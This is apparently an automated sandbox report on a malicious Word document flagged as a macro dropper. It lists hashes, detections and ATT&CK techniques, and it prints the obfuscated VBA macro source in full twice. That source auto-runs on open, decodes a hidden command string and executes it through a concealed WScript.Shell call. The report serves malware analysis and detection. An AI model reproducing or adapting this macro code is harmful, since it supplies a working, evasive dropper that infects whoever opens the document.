Office (OLE) malware analysis — malicious · 3050e45096bdeca5

MALICIOUS

Office (OLE)

127.5 KB Created: 2017-01-19 14:05:00 Authoring application: Microsoft Office Word First seen: 2017-04-25

MD5: 59b229377c6c4a0f94644a5f6ae674f4 SHA-1: 49d3564bf0c8bb7ccf9bd028ba49fdc7b31e2f35 SHA-256: 3050e45096bdeca55557d751d17554a004723b95d81b2a9436112a675ff928da

130 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro is obfuscated and uses a GetObject call, indicating it is designed to execute code. The ClamAV detection name 'Doc.Dropper.Agent-6619947-0' strongly suggests its purpose is to download and execute a secondary payload. The presence of a Document_Open macro further supports this, as it is commonly used to initiate malicious actions upon opening the document.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6619947-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6619947-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

ixoxewrspr = 152
GetObject("", "wS" & ThisDocument.jungleunder() & bananacorn()).exec awnhmwjdijteeqq
Dim qldxtoxqkitedy As Boolean

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Dim xueahlhjmyygobbjm
Public Sub Document_Open()
Dim kitpigeon As Boolean
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11450 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11450 bytes
SHA-256: `8ec79f4ab1494f7ae028eaeaf08519563352fe44c783590a6f1856c846a23eb0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim xueahlhjmyygobbjm Public Sub Document_Open() Dim kitpigeon As Boolean kitpigeon = 221 If kitpigeon > 37 Then Dim nmqfkceltfjo As Integer nmqfkceltfjo = 139 Dim akfpfzjzmugewdznox As Integer akfpfzjzmugewdznox = 29 Dim festivalobtain As String festivalobtain = "xkgadsrnamkg" End If Selection.TypeText ("... ... .." & vbCrLf) Dim chalkslim As Integer chalkslim = 208 If chalkslim = 59 Then Dim hbijdvnozybfl As String hbijdvnozybfl = "srvxvitwpbimf" Dim buzzfeature As String buzzfeature = "tbzxbpckoedwyt" End If Dim dzaoolrfomgzm As Boolean dzaoolrfomgzm = 93 'jliuwhphufpggracestone If dzaoolrfomgzm > 52 Then Dim fitnessmatch As Double fitnessmatch = 88 Dim yvqqjjgzszyuz As Boolean yvqqjjgzszyuz = 148 'archlakeeditsatoshi Dim gszhtckuisoqhuwq As Integer gszhtckuisoqhuwq = 155 'ljgxechtraxccnujovsc End If xueahlhjmyygobbjm = "@ZKQg5}j+16<644!_}1$$<v6BRB<6V>juK=" Dim bouncepepper As Byte bouncepepper = 70 Dim clogdonkey As Integer clogdonkey = 187 Dim donkeysuccess As String donkeysuccess = "admituncover" Dim nykbefkfehq As Integer nykbefkfehq = 90 Dim pctiockupil As Boolean pctiockupil = 242 hzferblfhuh Dim labelseed As Boolean labelseed = 212 If labelseed <> 206 Then Dim feetrigger As Double feetrigger = 86 'qxbozngzzmmfjirjqbuxttctzajwlmqpmmt Dim brandkey As String brandkey = "dashoil" Dim noblenorth As Boolean noblenorth = 3 Dim dyxmcwdbqlpy As Double dyxmcwdbqlpy = 57 'artworkvividnuvjwxnwqjhogztcug End If End Sub Function sgptplzrzguybk() Dim orfvhyefope As Long orfvhyefope = 117 'mwuqhqvwqgggbycdangershallow Dim pointseven As Integer pointseven = 91 Dim pelicantask As Long pelicantask = 204 Dim sprsksbupe As Integer sprsksbupe = 66 bossproud = "1= }5byPARs@+sZ_6 v($Z!NREw6-6$O=bg__JVEgc4T=1 646SByQBST6em.@NRE+KtgV.Wveggb>1C$lI1egvN}4TB61).KDQo=W>QNjL>}o+KaD@ZFQI6lKe('hZv$tZ@t4p:6/6/RlZ<n<>k$d4u!a}d1m<6in4" sgptplzrzguybk = bossproud & ".464c+o!Bm461/Ze6ZuraVu/vTjBD1YB.1<e<xev'+,u}'%T!EM6BPj%_+K\1\9Ks6$!.Be4_x6e')K61 &! 1=%TBQEg1M6P%\j\_<91s}.e}xe" Dim fqlzyrgtbea As Boolean fqlzyrgtbea = 62 Dim governobject As Double governobject = 144 'hrdheyhmcvratmfcpvrnezahimosj Dim umegxquxjlqkphm As Double umegxquxjlqkphm = 142 Dim yqowwogzkppzcvyxj As Long yqowwogzkppzcvyxj = 178 'scripttimecbyjnvnyu End Function Function awesomeskull(rbhkgdphfuwvvuniq) Dim brassdose As Integer brassdose = 15 'vmkncvnoydkjvcrkzzkjhctkjkhv If brassdose < 134 Then Dim servicetarget As Integer servicetarget = 190 Dim droppush As Integer droppush = 177 End If retVarbhkgdphfuwvvuniq = "" If xueahlhjmyygobbjm Like "" & rbhkgdphfuwvvuniq & "" Then Dim toyaoyywdkvsve As Byte toyaoyywdkvsve = 28 Dim acididea As Boolean acididea = 234 Dim zzshmqnrxczucqmgal As Long zzshmqnrxczucqmgal = 228 'asthmahiddenwjryphurtgctw Dim awayrent As String awayrent = "wcouvinmgcji" Dim inviteround As String inviteround = "agzbhoxzcacaqoyx" Dim blameharvest As Integer blameharvest = 113 'advicebulkbiutayohaj Dim tomorrowupset As Boolean tomorrowupset = 39 'dashsubwayavocadocart Dim dvyssskkpniykj As String dvyssskkpniykj = "kawohpetpczxm" Dim fsfwmjtpnucogozase As Boolean fsfwmjtpnucogozase = 4 Else Dim idlemultiply As Long idlemultiply = 56 If idlemultiply > 210 Then Dim ugppgvizmmqoidi As Integer ugppgvizmmqoidi = 208 'csfkdvkxwouogyrgfnlcqbdrqviwyijveitg Dim mzblsfnbviiq As Integer mzblsfnbviiq = 153 Dim degreefever As Byte degreefever = 234 'controlletternoticeweasel Dim draftquarter As String draftquarter = "suhkzxocxzx" 'junkloudaskkgxovdv Dim educatehover As Boolean educatehover = 225 'qkqaqabrqtypowhgssmoothtwenty End If retVarbhkgdphfuwvvuniq = rbhkgdphfuwvvuniq Dim pcdpfcmmufmu As String pcdpfcmmufmu = "ableglue" Dim pdptjlnhnpyza As Integer pdptjlnhnpyza = 83 Dim burdenpitch As String burdenpitch = "aipzejdgzfetauwq" Dim courseturkey As Integer courseturkey = 170 Dim mahfhtzkpdnbdgrv As Integer mahfhtzkpdnbdgrv = 152 'remaintouristadaptnothing Dim nqneukmutbtotilnmmw As Byte nqneukmutbtotilnmmw = 177 'xivfacdlzivfdyacivkfdigxnry End If awesomeskull = retVarbhkgdphfuwvvuniq Dim mixsafe As Double mixsafe = 90 'findstrongenactproud If mixsafe < 248 Then Dim puqrkzvjbfci As Byte puqrkzvjbfci = 140 Dim clawtag As Integer clawtag = 185 End If End Function Sub hzferblfhuh() Dim allswim As Long allswim = 73 Dim qjdaisqtwmhyoagtrdx As Double qjdaisqtwmhyoagtrdx = 144 Dim drinksize As Byte drinksize = 27 Dim jmtjiyvavchjzb As Integer jmtjiyvavchjzb = 213 Dim gzhonlgatg As Double gzhonlgatg = 56 bqenwrsoublv = "C>$m1Dj.eKX!BE<j /u6C4R Z@P+o4we_rsKhELjL}.e$@x=eB< jR-Z1w46VI55NBD6Bo_WR<SZTQyv_lKe1 _Hj}IV4dg<De61N4 54-gN5oPur6O_jFjil5E_$ }-j*6EX!1jE+5CBUuTVIVOn6P_O}_ZLIK6c=Ky" & sgptplzrzguybk() divideinmate = "" Dim lwyyvmkkaqndlu As Long lwyyvmkkaqndlu = 189 If lwyyvmkkaqndlu = 120 Then Dim slabsolution As Long slabsolution = 249 Dim debrispraise As Boolean debrispraise = 118 Dim magicpitch As Byte magicpitch = 174 End If For yjzfsjfijrh = 1 To Len(bqenwrsoublv) Dim fitsuit As Long fitsuit = 110 If fitsuit < 160 Then Dim dizzyeye As Long dizzyeye = 254 Dim leavesubject As Boolean leavesubject = 55 Dim axisonline As String axisonline = "damageone" Dim ngilbhdsllww As Long ngilbhdsllww = 200 'storytypezfmhrtkexmzfiackqem Dim couchunlock As Byte couchunlock = 121 'zdwqmgllbdjlfsjakgbdfgv End If Dim askvocal As Integer askvocal = 199 Dim oidkoxcmsidpdwcefil As Long oidkoxcmsidpdwcefil = 92 rbhkgdphfuwvvuniq = Mid(bqenwrsoublv, yjzfsjfijrh, 1) bvkoinmaad = awesomeskull(rbhkgdphfuwvvuniq) Dim drumtired As Double drumtired = 141 Dim guiltspread As Long guiltspread = 166 'escapeskatetryqfvukrvdeecs Dim dampraccoon As Byte dampraccoon = 207 Dim actshy As Boolean actshy = 175 'dgtzjgszkrwzhuvopuclsu Dim apxxnhfucbwnrdyx As Double apxxnhfucbwnrdyx = 186 'fthuqsvfvmxepwzzxjlljgdcmeefcv If apxxnhfucbwnrdyx <> 234 Then Dim clutchtrue As Long clutchtrue = 216 Dim dutyfortune As Double dutyfortune = 182 Dim mcujaqnfq As Long mcujaqnfq = 55 Dim qnqunewzhzta As Long qnqunewzhzta = 222 End If divideinmate = divideinmate & bvkoinmaad Dim belowjealous As Integer belowjealous = 127 'eqwrnizaurmdmbkylxbwhufvviqrc If belowjealous = 162 Then Dim disorderslow As Integer disorderslow = 234 Dim diagramnerve As Byte diagramnerve = 126 'cugweytpysrhjcmrfrostplate End If Next Module1.notablesun (divideinmate) End Sub Function jungleunder() Dim keynormal As Integer keynormal = 217 Dim ipcoonhomzjlu As Integer ipcoonhomzjlu = 199 'textweirdobjecttank Dim suevtirjuglewbpbq As Byte suevtirjuglewbpbq = 86 Dim crimeexhaust As Double crimeexhaust = 28 'drillshovevvdiyegonj operasoul = "t." jungleunder = "crIP" & operasoul Dim chalkstyle As Integer chalkstyle = 13 'dignityonealonethunder Dim flowerjuice As Byte flowerjuice = 215 Dim elbowjewel As Long elbowjewel = 141 Dim jntovieoqxe As Boolean jntovieoqxe = 239 End Function Attribute VB_Name = "Module1" Function bananacorn() Dim hzcpqjjcevjkhyddnn As Boolean hzcpqjjcevjkhyddnn = 168 'apbrgbdnmbkghwifanhorn If hzcpqjjcevjkhyddnn > 74 Then Dim chatuncle As Boolean chatuncle = 10 'izzuejsumbhenaunwgunxsslowobxpjxssg Dim hcsvwgldr As Byte hcsvwgldr = 122 Dim ghpcbnopfcgvr As Double ghpcbnopfcgvr = 78 'homevideorzffjxamajyezlriul Dim lengthnature As Integer lengthnature = 225 End If Dim dyrpsnlckrppepokpdt As Double dyrpsnlckrppepokpdt = 121 'yfrofcuufuwoxixutmubaopstaew If dyrpsnlckrppepokpdt = 225 Then Dim uhoctjuceqluck As Byte uhoctjuceqluck = 28 Dim outputsave As Integer outputsave = 8 'confirmstuffleavevague Dim autobest As Long autobest = 247 End If sfczeroeyfnctm = "e" Dim diagramstart As Double diagramstart = 80 Dim iconrebel As Long iconrebel = 248 Dim vmfeusirbidmaw As Boolean vmfeusirbidmaw = 248 Dim knocktransfer As Integer knocktransfer = 131 Dim rprroajvsrqeby As Integer rprroajvsrqeby = 107 Dim inquiryuseless As Byte inquiryuseless = 147 interestrecall = "lL" Dim mlptfditexlljfdihr As Double mlptfditexlljfdihr = 64 'purposewetmdysltmuetwf If mlptfditexlljfdihr <> 17 Then Dim swarmutility As Double swarmutility = 32 'hourpalaceqagecpzai Dim lxtqwumlwuzqepty As Double lxtqwumlwuzqepty = 229 Dim xpyvuxsbkemmy As Double xpyvuxsbkemmy = 172 Dim copperfrost As Double copperfrost = 246 'fetwsoortjhmvnpftmileazgirntm Dim whtjuikrkdarpmvl As Double whtjuikrkdarpmvl = 132 'rowhplahwjjinuuxmfwdzwguxfajccz End If Dim kkehgezgbixqnhspz As Boolean kkehgezgbixqnhspz = 200 'armorbirduzkzpjhylijhmwnbwe If kkehgezgbixqnhspz > 105 Then Dim ybjavxbmaohbsrmz As Byte ybjavxbmaohbsrmz = 189 Dim anotherhip As Long anotherhip = 48 'endfaintcrytime End If bananacorn = Chr(83) & Chr(72) & sfczeroeyfnctm & interestrecall Dim elevatorobtain As Double elevatorobtain = 184 Dim mhpazctxflmmiuzl As String mhpazctxflmmiuzl = "jjjakfvjwma" Dim udffdvioxabfmds As Double udffdvioxabfmds = 161 If udffdvioxabfmds <> 236 Then Dim ckwyfqqkjhqrkv As Integer ckwyfqqkjhqrkv = 215 Dim angerthing As Integer angerthing = 65 Dim txyrneofegsy As Double txyrneofegsy = 245 'obtainpullbuildexcite End If End Function Function gloveski() Dim gaugelawn As Long gaugelawn = 54 'smallstockenvelopeunfold If gaugelawn = 70 Then Dim ydirkahqua As Long ydirkahqua = 130 Dim fxnodubdnqqqfuhrej As Boolean fxnodubdnqqqfuhrej = 200 End If Dim cathole As Integer cathole = 163 If cathole > 182 Then Dim halfoblige As Byte halfoblige = 249 'jrzogxjjjspwrdebttfxdlyzkkpotw Dim immuneprotect As Double immuneprotect = 42 Dim foldmaterial As Boolean foldmaterial = 70 Dim orbjlwznbagdcvvlg As Byte orbjlwznbagdcvvlg = 34 'wybbpadrqhkxdtblwiwffetioslalczoy Dim spirittoken As String spirittoken = "igrshipieqrtp" End If gloveski = Chr(82) & "U" & Chr(78) End Function Function notablesun(awnhmwjdijteeqq) Dim xatneqjggkube As Integer xatneqjggkube = 112 'includemedalywqvylcyirrjmegwxp Dim xoiajhqubfewokyy As Boolean xoiajhqubfewokyy = 59 Dim ukpbwjctcklxdrzh As Integer ukpbwjctcklxdrzh = 172 'yxqefiebnxhnjssdofbfxmthx Dim hugeplace As Byte hugeplace = 24 Dim ixoxewrspr As Byte ixoxewrspr = 152 GetObject("", "wS" & ThisDocument.jungleunder() & bananacorn()).exec awnhmwjdijteeqq Dim qldxtoxqkitedy As Boolean qldxtoxqkitedy = 191 Dim armyhotel As Long armyhotel = 235 'pkolnuvcenmnzqeeidyh Dim dbevhqaaixfxsynvbet As Double dbevhqaaixfxsynvbet = 96 If dbevhqaaixfxsynvbet <> 198 Then Dim umfignzqnpijajkxygg As String umfignzqnpijajkxygg = "closemeadow" Dim cargiraffe As Byte cargiraffe = 30 'doddroxnogjfbravethen Dim hywnjcyoxj As Double hywnjcyoxj = 106 Dim loyalrepair As String loyalrepair = "leisuresoft" Dim furyrubber As Double furyrubber = 137 'ekrpnrrzgpsiilopwgjvby End If notablesun = 3020 Dim absorbflower As Boolean absorbflower = 86 'chunksubjectxrbguwquhza If absorbflower > 226 Then Dim palmsquare As Integer palmsquare = 144 Dim bxqeqakazerlcktpk As Boolean bxqeqakazerlcktpk = 235 'edgemovieholemenu End If End Function

SHA-256: 8ec79f4ab1494f7ae028eaeaf08519563352fe44c783590a6f1856c846a23eb0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim xueahlhjmyygobbjm
Public Sub Document_Open()
Dim kitpigeon As Boolean
kitpigeon = 221
If kitpigeon > 37 Then
Dim nmqfkceltfjo As Integer
nmqfkceltfjo = 139
Dim akfpfzjzmugewdznox As Integer
akfpfzjzmugewdznox = 29
Dim festivalobtain As String
festivalobtain = "xkgadsrnamkg"
End If
Selection.TypeText ("... ... .." & vbCrLf)
Dim chalkslim As Integer
chalkslim = 208
If chalkslim = 59 Then
Dim hbijdvnozybfl As String
hbijdvnozybfl = "srvxvitwpbimf"
Dim buzzfeature As String
buzzfeature = "tbzxbpckoedwyt"
End If
Dim dzaoolrfomgzm As Boolean
dzaoolrfomgzm = 93
'jliuwhphufpggracestone
If dzaoolrfomgzm > 52 Then
Dim fitnessmatch As Double
fitnessmatch = 88
Dim yvqqjjgzszyuz As Boolean
yvqqjjgzszyuz = 148
'archlakeeditsatoshi
Dim gszhtckuisoqhuwq As Integer
gszhtckuisoqhuwq = 155
'ljgxechtraxccnujovsc
End If

xueahlhjmyygobbjm = "@ZKQg5}j+16<644!*_}1$$<v6BRB<6V>juK="
Dim bouncepepper As Byte
bouncepepper = 70
Dim clogdonkey As Integer
clogdonkey = 187
Dim donkeysuccess As String
donkeysuccess = "admituncover"
Dim nykbefkfehq As Integer
nykbefkfehq = 90
Dim pctiockupil As Boolean
pctiockupil = 242
hzferblfhuh
Dim labelseed As Boolean
labelseed = 212
If labelseed <> 206 Then
Dim feetrigger As Double
feetrigger = 86
'qxbozngzzmmfjirjqbuxttctzajwlmqpmmt
Dim brandkey As String
brandkey = "dashoil"
Dim noblenorth As Boolean
noblenorth = 3
Dim dyxmcwdbqlpy As Double
dyxmcwdbqlpy = 57
'artworkvividnuvjwxnwqjhogztcug
End If
End Sub
Function sgptplzrzguybk()
Dim orfvhyefope As Long
orfvhyefope = 117
'mwuqhqvwqgggbycdangershallow
Dim pointseven As Integer
pointseven = 91
Dim pelicantask As Long
pelicantask = 204
Dim sprsksbupe As Integer
sprsksbupe = 66
bossproud = "1= }5byPARs@+sZ_6 v($Z!NREw6-6$O=bg__JVEgc4T=1 646SByQBST6em.@NRE+KtgV.Wveggb>1C$lI1egvN}4TB61).KDQo=W>QNjL>}o+KaD@ZFQI6lKe*(*'hZv$tZ@t4p:6/6/RlZ<n<>k$d4u!a}d1m<6in4"
sgptplzrzguybk = bossproud & ".464c+o!Bm461/Ze6ZuraVu/vTjBD1YB.1<e<xev'+,u}'%T!EM6BPj%_+K\1\9Ks6$!.Be4_x6e')K61 &! 1=%TBQEg1M6P%\j\_<91s}.e}xe"
Dim fqlzyrgtbea As Boolean
fqlzyrgtbea = 62
Dim governobject As Double
governobject = 144
'hrdheyhmcvratmfcpvrnezahimosj
Dim umegxquxjlqkphm As Double
umegxquxjlqkphm = 142
Dim yqowwogzkppzcvyxj As Long
yqowwogzkppzcvyxj = 178
'scripttimecbyjnvnyu
End Function
Function awesomeskull(rbhkgdphfuwvvuniq)
Dim brassdose As Integer
brassdose = 15
'vmkncvnoydkjvcrkzzkjhctkjkhv
If brassdose < 134 Then
Dim servicetarget As Integer
servicetarget = 190
Dim droppush As Integer
droppush = 177
End If
retVarbhkgdphfuwvvuniq = ""
If xueahlhjmyygobbjm Like "*" & rbhkgdphfuwvvuniq & "*" Then
Dim toyaoyywdkvsve As Byte
toyaoyywdkvsve = 28
Dim acididea As Boolean
acididea = 234
Dim zzshmqnrxczucqmgal As Long
zzshmqnrxczucqmgal = 228
'asthmahiddenwjryphurtgctw
Dim awayrent As String
awayrent = "wcouvinmgcji"
Dim inviteround As String
inviteround = "agzbhoxzcacaqoyx"
Dim blameharvest As Integer
blameharvest = 113
'advicebulkbiutayohaj
Dim tomorrowupset As Boolean
tomorrowupset = 39
'dashsubwayavocadocart
Dim dvyssskkpniykj As String
dvyssskkpniykj = "kawohpetpczxm"
Dim fsfwmjtpnucogozase As Boolean
fsfwmjtpnucogozase = 4
Else
Dim idlemultiply As Long
idlemultiply = 56
If idlemultiply > 210 Then
Dim ugppgvizmmqoidi As Integer
ugppgvizmmqoidi = 208
'csfkdvkxwouogyrgfnlcqbdrqviwyijveitg
Dim mzblsfnbviiq As Integer
mzblsfnbviiq = 153
Dim degreefever As Byte
degreefever = 234
'controlletternoticeweasel
Dim draftquarter As String
draftquarter = "suhkzxocxzx"
'junkloudaskkgxovdv
Dim educatehover As Boolean
educatehover = 225
'qkqaqabrqtypowhgssmoothtwenty
End If
retVarbhkgdphfuwvvuniq = rbhkgdphfuwvvuniq
Dim pcdpfcmmufmu As String
pcdpfcmmufmu = "ableglue"
Dim pdptjlnhnpyza As Integer
pdptjlnhnpyza = 83
Dim burdenpitch As String
burdenpitch = "aipzejdgzfetauwq"
Dim courseturkey As Integer
courseturkey = 170
Dim mahfhtzkpdnbdgrv As Integer
mahfhtzkpdnbdgrv = 152
'remaintouristadaptnothing
Dim nqneukmutbtotilnmmw As Byte
nqneukmutbtotilnmmw = 177
'xivfacdlzivfdyacivkfdigxnry
End If
awesomeskull = retVarbhkgdphfuwvvuniq
Dim mixsafe As Double
mixsafe = 90
'findstrongenactproud
If mixsafe < 248 Then
Dim puqrkzvjbfci As Byte
puqrkzvjbfci = 140
Dim clawtag As Integer
clawtag = 185
End If
End Function
Sub hzferblfhuh()
Dim allswim As Long
allswim = 73
Dim qjdaisqtwmhyoagtrdx As Double
qjdaisqtwmhyoagtrdx = 144
Dim drinksize As Byte
drinksize = 27
Dim jmtjiyvavchjzb As Integer
jmtjiyvavchjzb = 213
Dim gzhonlgatg As Double
gzhonlgatg = 56
bqenwrsoublv = "C>$m1*Dj.eKX!BE<j /u6C4R Z@P+o4we_rsKhELjL}.e$@x=eB< jR-Z1w46VI55NBD6Bo_WR<SZTQyv_lKe1 _Hj}IV4dg<De61N4 54-gN5oPur6O_jFjil5E_$ }-j*6EX!1jE+5CBUuTVIVOn6P_O}_ZLIK6c=Ky" & sgptplzrzguybk()
divideinmate = ""
Dim lwyyvmkkaqndlu As Long
lwyyvmkkaqndlu = 189
If lwyyvmkkaqndlu = 120 Then
Dim slabsolution As Long
slabsolution = 249
Dim debrispraise As Boolean
debrispraise = 118
Dim magicpitch As Byte
magicpitch = 174
End If
For yjzfsjfijrh = 1 To Len(bqenwrsoublv)
Dim fitsuit As Long
fitsuit = 110
If fitsuit < 160 Then
Dim dizzyeye As Long
dizzyeye = 254
Dim leavesubject As Boolean
leavesubject = 55
Dim axisonline As String
axisonline = "damageone"
Dim ngilbhdsllww As Long
ngilbhdsllww = 200
'storytypezfmhrtkexmzfiackqem
Dim couchunlock As Byte
couchunlock = 121
'zdwqmgllbdjlfsjakgbdfgv
End If
Dim askvocal As Integer
askvocal = 199
Dim oidkoxcmsidpdwcefil As Long
oidkoxcmsidpdwcefil = 92
rbhkgdphfuwvvuniq = Mid(bqenwrsoublv, yjzfsjfijrh, 1)
bvkoinmaad = awesomeskull(rbhkgdphfuwvvuniq)
Dim drumtired As Double
drumtired = 141
Dim guiltspread As Long
guiltspread = 166
'escapeskatetryqfvukrvdeecs
Dim dampraccoon As Byte
dampraccoon = 207
Dim actshy As Boolean
actshy = 175
'dgtzjgszkrwzhuvopuclsu
Dim apxxnhfucbwnrdyx As Double
apxxnhfucbwnrdyx = 186
'fthuqsvfvmxepwzzxjlljgdcmeefcv
If apxxnhfucbwnrdyx <> 234 Then
Dim clutchtrue As Long
clutchtrue = 216
Dim dutyfortune As Double
dutyfortune = 182
Dim mcujaqnfq As Long
mcujaqnfq = 55
Dim qnqunewzhzta As Long
qnqunewzhzta = 222
End If
divideinmate = divideinmate & bvkoinmaad
Dim belowjealous As Integer
belowjealous = 127
'eqwrnizaurmdmbkylxbwhufvviqrc
If belowjealous = 162 Then
Dim disorderslow As Integer
disorderslow = 234
Dim diagramnerve As Byte
diagramnerve = 126
'cugweytpysrhjcmrfrostplate
End If
Next
Module1.notablesun (divideinmate)
End Sub
Function jungleunder()
Dim keynormal As Integer
keynormal = 217
Dim ipcoonhomzjlu As Integer
ipcoonhomzjlu = 199
'textweirdobjecttank
Dim suevtirjuglewbpbq As Byte
suevtirjuglewbpbq = 86
Dim crimeexhaust As Double
crimeexhaust = 28
'drillshovevvdiyegonj
operasoul = "t."
jungleunder = "crIP" & operasoul
Dim chalkstyle As Integer
chalkstyle = 13
'dignityonealonethunder
Dim flowerjuice As Byte
flowerjuice = 215
Dim elbowjewel As Long
elbowjewel = 141
Dim jntovieoqxe As Boolean
jntovieoqxe = 239
End Function


Attribute VB_Name = "Module1"
Function bananacorn()
Dim hzcpqjjcevjkhyddnn As Boolean
hzcpqjjcevjkhyddnn = 168
'apbrgbdnmbkghwifanhorn
If hzcpqjjcevjkhyddnn > 74 Then
Dim chatuncle As Boolean
chatuncle = 10
'izzuejsumbhenaunwgunxsslowobxpjxssg
Dim hcsvwgldr As Byte
hcsvwgldr = 122
Dim ghpcbnopfcgvr As Double
ghpcbnopfcgvr = 78
'homevideorzffjxamajyezlriul
Dim lengthnature As Integer
lengthnature = 225
End If
Dim dyrpsnlckrppepokpdt As Double
dyrpsnlckrppepokpdt = 121
'yfrofcuufuwoxixutmubaopstaew
If dyrpsnlckrppepokpdt = 225 Then
Dim uhoctjuceqluck As Byte
uhoctjuceqluck = 28
Dim outputsave As Integer
outputsave = 8
'confirmstuffleavevague
Dim autobest As Long
autobest = 247
End If
sfczeroeyfnctm = "e"
Dim diagramstart As Double
diagramstart = 80
Dim iconrebel As Long
iconrebel = 248
Dim vmfeusirbidmaw As Boolean
vmfeusirbidmaw = 248
Dim knocktransfer As Integer
knocktransfer = 131
Dim rprroajvsrqeby As Integer
rprroajvsrqeby = 107
Dim inquiryuseless As Byte
inquiryuseless = 147
interestrecall = "lL"
Dim mlptfditexlljfdihr As Double
mlptfditexlljfdihr = 64
'purposewetmdysltmuetwf
If mlptfditexlljfdihr <> 17 Then
Dim swarmutility As Double
swarmutility = 32
'hourpalaceqagecpzai
Dim lxtqwumlwuzqepty As Double
lxtqwumlwuzqepty = 229
Dim xpyvuxsbkemmy As Double
xpyvuxsbkemmy = 172
Dim copperfrost As Double
copperfrost = 246
'fetwsoortjhmvnpftmileazgirntm
Dim whtjuikrkdarpmvl As Double
whtjuikrkdarpmvl = 132
'rowhplahwjjinuuxmfwdzwguxfajccz
End If
Dim kkehgezgbixqnhspz As Boolean
kkehgezgbixqnhspz = 200
'armorbirduzkzpjhylijhmwnbwe
If kkehgezgbixqnhspz > 105 Then
Dim ybjavxbmaohbsrmz As Byte
ybjavxbmaohbsrmz = 189
Dim anotherhip As Long
anotherhip = 48
'endfaintcrytime
End If
bananacorn = Chr(83) & Chr(72) & sfczeroeyfnctm & interestrecall
Dim elevatorobtain As Double
elevatorobtain = 184
Dim mhpazctxflmmiuzl As String
mhpazctxflmmiuzl = "jjjakfvjwma"
Dim udffdvioxabfmds As Double
udffdvioxabfmds = 161
If udffdvioxabfmds <> 236 Then
Dim ckwyfqqkjhqrkv As Integer
ckwyfqqkjhqrkv = 215
Dim angerthing As Integer
angerthing = 65
Dim txyrneofegsy As Double
txyrneofegsy = 245
'obtainpullbuildexcite
End If
End Function
Function gloveski()
Dim gaugelawn As Long
gaugelawn = 54
'smallstockenvelopeunfold
If gaugelawn = 70 Then
Dim ydirkahqua As Long
ydirkahqua = 130
Dim fxnodubdnqqqfuhrej As Boolean
fxnodubdnqqqfuhrej = 200
End If
Dim cathole As Integer
cathole = 163
If cathole > 182 Then
Dim halfoblige As Byte
halfoblige = 249
'jrzogxjjjspwrdebttfxdlyzkkpotw
Dim immuneprotect As Double
immuneprotect = 42
Dim foldmaterial As Boolean
foldmaterial = 70
Dim orbjlwznbagdcvvlg As Byte
orbjlwznbagdcvvlg = 34
'wybbpadrqhkxdtblwiwffetioslalczoy
Dim spirittoken As String
spirittoken = "igrshipieqrtp"
End If
gloveski = Chr(82) & "U" & Chr(78)
End Function
Function notablesun(awnhmwjdijteeqq)
Dim xatneqjggkube As Integer
xatneqjggkube = 112
'includemedalywqvylcyirrjmegwxp
Dim xoiajhqubfewokyy As Boolean
xoiajhqubfewokyy = 59
Dim ukpbwjctcklxdrzh As Integer
ukpbwjctcklxdrzh = 172
'yxqefiebnxhnjssdofbfxmthx
Dim hugeplace As Byte
hugeplace = 24
Dim ixoxewrspr As Byte
ixoxewrspr = 152
GetObject("", "wS" & ThisDocument.jungleunder() & bananacorn()).exec awnhmwjdijteeqq
Dim qldxtoxqkitedy As Boolean
qldxtoxqkitedy = 191
Dim armyhotel As Long
armyhotel = 235
'pkolnuvcenmnzqeeidyh
Dim dbevhqaaixfxsynvbet As Double
dbevhqaaixfxsynvbet = 96
If dbevhqaaixfxsynvbet <> 198 Then
Dim umfignzqnpijajkxygg As String
umfignzqnpijajkxygg = "closemeadow"
Dim cargiraffe As Byte
cargiraffe = 30
'doddroxnogjfbravethen
Dim hywnjcyoxj As Double
hywnjcyoxj = 106
Dim loyalrepair As String
loyalrepair = "leisuresoft"
Dim furyrubber As Double
furyrubber = 137
'ekrpnrrzgpsiilopwgjvby
End If
notablesun = 3020
Dim absorbflower As Boolean
absorbflower = 86
'chunksubjectxrbguwquhza
If absorbflower > 226 Then
Dim palmsquare As Integer
palmsquare = 144
Dim bxqeqakazerlcktpk As Boolean
bxqeqakazerlcktpk = 235
'edgemovieholemenu
End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.